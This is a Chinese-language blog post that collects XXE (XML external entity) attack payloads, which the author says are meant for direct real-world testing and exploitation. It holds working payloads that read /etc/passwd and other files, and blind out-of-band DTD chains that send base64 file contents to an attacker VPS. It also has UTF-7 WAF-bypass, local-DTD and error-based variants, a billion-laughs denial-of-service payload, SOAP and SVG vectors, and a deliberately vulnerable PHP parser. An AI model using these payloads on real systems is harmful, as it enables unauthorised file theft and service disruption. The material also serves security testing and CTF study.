XXE payload总结

最新推荐文章于 2024-10-02 21:28:55 发布
最新推荐文章于 2024-10-02 21:28:55 发布
阅读量1k 收藏 22
点赞数 22
分类专栏: Web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ULGANOY/article/details/141861517
版权

前言

关于XXE相关的一些payload的总结记录,更侧重于实战直接拿来测试利用,而非CTF绕WAF。。。

Classic XXE

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

可读文件,探测内网。

有时可以采用php、data伪协议绕过。

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

UTF-7 XXE

UTF-7编码绕WAF

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

Blind XXE (※)

无回显的情况。这个值得好好记一下。

学习参考:

https://xz.aliyun.com/t/8041

大致思路:

服务器没有回显,只能通过一条外带信道带出数据。

利用参数实体可嵌套引用的特点。

Classic Blind XXE

xml.php

一个存在XXE漏洞的服务:

<?php
    libxml_disable_entity_loader(false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
?>

test.dtd

vps上放test.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://vps_ip:2333?p=%file;'>">

vps开9999端口的http服务,开2333端口监听。

payload

攻击XXE漏洞服务的payload

<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://vps_ip:9999/test.dtd">
%remote;%int;%send;
]>
<user><username>Admin</username></user>

调用过程

一个巧妙的嵌套调用链:

  1. %remote请求远程vps上的test.dtd
  2. %int调用test.dtd中的%file
  3. %file获取服务器上的敏感文件,并传入%send
  4. %send将数据发送到远程vps上

这样vps就会收到file:///etc/passwd的执行结果,带出了执行回显。

Local DTD

以上都是引入外部服务器的OOB XXE,虽然好用,但是有一个软肋。当服务器配置好防火墙,禁止服务器请求外网dtd文件的话,就无法接受到数据了。

这时候就可以考虑利用本地dtd来进行XXE

也是一个技巧,积累一下。

本地DTD文件

Linux

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa 'Your DTD code'>
%local_dtd;

在这里插入图片描述

Windows

<!ENTITY % local_dtd SYSTEM "file:///C:Windows/System32/wbem/xml/cim20.dtd">
<!ENTITY % SuperClass 'Your DTD code'>
%local_dtd;

在这里插入图片描述

在这里插入图片描述

利用示例:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
            	<!ENTITY &#x25; file SYSTEM "file:///flag"
                <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; remote SYSTEM &#x27;http://vps_ip:2333/&#x25;file&#x27;>">
         		&#x25;eval;
                &#x25;remote;
	'>
%local_dtd;

]>
<msg>Msg</msg>

Error-Based Blind XXE

基于报错的原理和OOB类似,OOB通过构造一个带外的url将数据带出,而基于报错是构造一个错误的url并将泄露文件内容放在url中,通过这样的方式返回数据。

这样在报错中就能看到命令回显。(服务端报错)

引入服务器文件

test.dtd

<!ENTITY % start "<!ENTITY % error SYSTEM 'file:///fakefile/%file;'>">
%start;

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "http://vps_ip/test.dtd">
    <!ENTITY % file SYSTEM "file:///flag">
    %remote;
    %error;
]>
<message>Admin</message>

引入本地文件

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % ISOamso '
		<!ENTITY &#x25; file SYSTEM "file:///flag">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///fakefile/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
    '> 
    %local_dtd;
]>
<message>Admin</message>

(注意嵌套时要实体编码% => &#x25;'=>&#x27&=>&#x26)

实例:GoogleCTF2019 Bnv

最终payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % ISOamso '
		<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///fakefile/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
    '> 
    %local_dtd;
]>
<message>Admin</message>

有个很坑的点:"<!ENTITY &#x26;#x25; error SYSTEM 这里的%要将实体编码后的&再编码一次。

在这里插入图片描述

DoS XXE

Billion Laugh Attack

<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<tag>&lol9;</tag>

SOAP XXE

<soap:Body>
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>

SVG XXE

一种XML格式的图片。存在文件上传限制图片,如果有SVG格式可以考虑SVG-XXE。

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
    <image xlink:href="expect://ls"></image>
</svg>

MS XXE

微软三件套,解压后都有xml,某些版本可以构造XXE。

在这里插入图片描述

N0zoM1z0
关注
专栏目录
payload-xxe
vcdy
07-09 160
<?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITYcontent SYSTEM"file:///etc/passwd">]> <name>&content;</name> *********************************************************** <?xml version="1.0"?> <!DOCTYP...
XXE注入payload列表:技术解析与应用指南
gitblog_00093的博客
04-10 541
XXE注入payload列表:技术解析与应用指南 xxe-injection-payload-list???? XML External Entity (XXE) Injection Payload List项目地址:https://gitcode.com/gh_mirrors/xx/xxe-injection-payload-list 在Web安全领域,XML External Entity(XXE...
web安全】——XXE漏洞
最新发布
wxh的博客
10-02 1295
XML被称为可扩展标记语言,与HTML类似,但是HTML中的标签都是预定义(预先定义好每个标签的作用)的,而XML语言中的标签都是自定义(可以自己定义标签的名称、属性、值、作用)的;HTML中的标签可以是单标签,而XML中的标签必须是成对出现。
XXE payload
黑面狐
08-16 7755
一、漏洞原理 当xml可以控制,并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。 二、漏洞测试 平时burp 抓包 可以在请求头添加  Content-type:application/xml 并添加 xml语句如果报错 或执行则有可能存在xxe漏洞,不断根据response fuzz即可 三、XXE payload 网上收集的payload -------------...
常见的XXE ---playload
qq_43355651的博客
06-04 487
XXE(XML External Entity)攻击是一种常见的Web安全漏洞,它允许攻击者干扰应用程序处理XML数据的方式。这些是一些常见的XXE攻击playload,但请注意,XXE攻击的有效性取决于目标应用程序的具体配置和上下文。为了保护应用程序免受XXE攻击,建议禁用外部实体的解析,并使用安全的XML解析器配置。当应用程序不返回XXE注入的结果时,可以使用blind XXE攻击。文件中,可以定义一个外部实体,该实体将尝试从目标服务器获取数据并将其发送到攻击者的服务器。
blind XXE payload
Js_123456789的博客
08-19 580
简单验证 POST /test HTTP/1.1 Content-Type: application/soap+xml User-Agent: scanner Accept: */* Cache-Control: no-cache Host: 域名 Content-Length: 142 Connection: close <?xml version="1.0" encoding...
xxepayload
05-12
XXE (XML External Entity)攻击是一种利用XML解析器漏洞的攻击方式,可以让攻击者读取任意文件、执行远程请求等。下面是一些常见的XXE攻击载荷: 1. 使用本地文件 ``` <!DOCTYPE foo [ <!ELEMENT foo ANY > <!...
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
02-06
XML外部实体(XXE,XML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
XXE常用的payload
02-28
下面是一些常用的XXE攻击payload: 1. 本地文件读取: ``` <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM '...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
构造合适的XML实体payload,尝试读取服务器文件,如`/etc/passwd`,或者通过PHP过滤器读取目标文件内容。 总之,XXE漏洞是一个严重的安全问题,需要开发者和安全人员重视。理解其原理、危害、检测和利用方式,以及...
XXE漏洞学习之CTF
qq_46085232的博客
04-09 653
两道有关XXE的CTF题目盲猜过程总结Vulnhub练习题过程总结 盲猜 题目地址:http://web.jarvisoj.com:9882/ 过程 访问题目地址 提交数据,进行抓包 看到数据提交这里,以为是基于json格式的sql注入,结果不是的,看页面源代码也看不出啥的,只怪自己的太菜。后来,才知道这里靠xxe漏洞,盲猜服务端能接受xml格式数据,修改Content-tpye值,并提交xml格式的playload。 修改数据包,进行提交,获取flag(这里我通过读取etc/passwd知道有hom
XXE无回显(使用vps-payload外带)
per_se_veran_ce的博客
03-22 2344
1、抓包写入payload 2、vps根目录下存放evil.dtd文件,监听端口设置为1333 3、开启端口监听 4、Burpsuite发送请求包 5、vps监听获得/etc/passwd的base64编码 6、解码 ...
XXE漏洞
2301_80337881的博客
03-30 2111
XML(Extensible Markup Language)是一种类似于HTML,但是没有使用预定义标记的语言。因此,可以根据自己的设计需求定义专属的标记。这是一种强大将数据存储在一个可以存储、搜索和共享的格式中的方法。最重要的是,因为 XML 的基本格式是标准化的,如果你在本地或互联网上跨系统或平台共享或传输 XML,由于标准化的 XML 语法,接收者仍然可以解析数据。举个例子:假设一个微信群里面小明发了一条消息“你吃过没”。
XXE漏洞详解
weixin_56714714的博客
07-25 7870
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1597
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE)漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
漏洞复现之xxe漏洞
千寻的博客
07-30 712
文章目录XXE-基础实验实验目的实验环境实验工具实验内容实验步骤1.访问目标进行注入攻击2.尝试进行登录,并进行抓包3.根据xxe注入漏洞,构造payloa免责声明 XXE-基础实验 实验目的 练习XXE(XML注入) 实验环境 目标机: windows2008 172.16.12.2 目标地址:http://172.16.12.2 实验工具 火狐浏览器:是一款非常稳定,非常流行的Internet浏览器 Burp Suite 实验内容 XXE(XML注入) 实验步骤 1.访问目标进行
[WEB安全]XXE漏洞总结
baguangman5501的博客
07-28 483
目录 0x00 XML基础 0x01 XML文档结构 0x02 DTD 0x03 实体 0x04 XXE漏洞 0x05 总结一些payload 0x06 XXE漏洞修复与防御 0x07 参考链接 ...
网络安全XXE漏洞总结(pikachu靶场案例解析)
qq_61529962的博客
12-15 556
xxe漏洞原理解析,php靶场案例,pikachu靶场
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值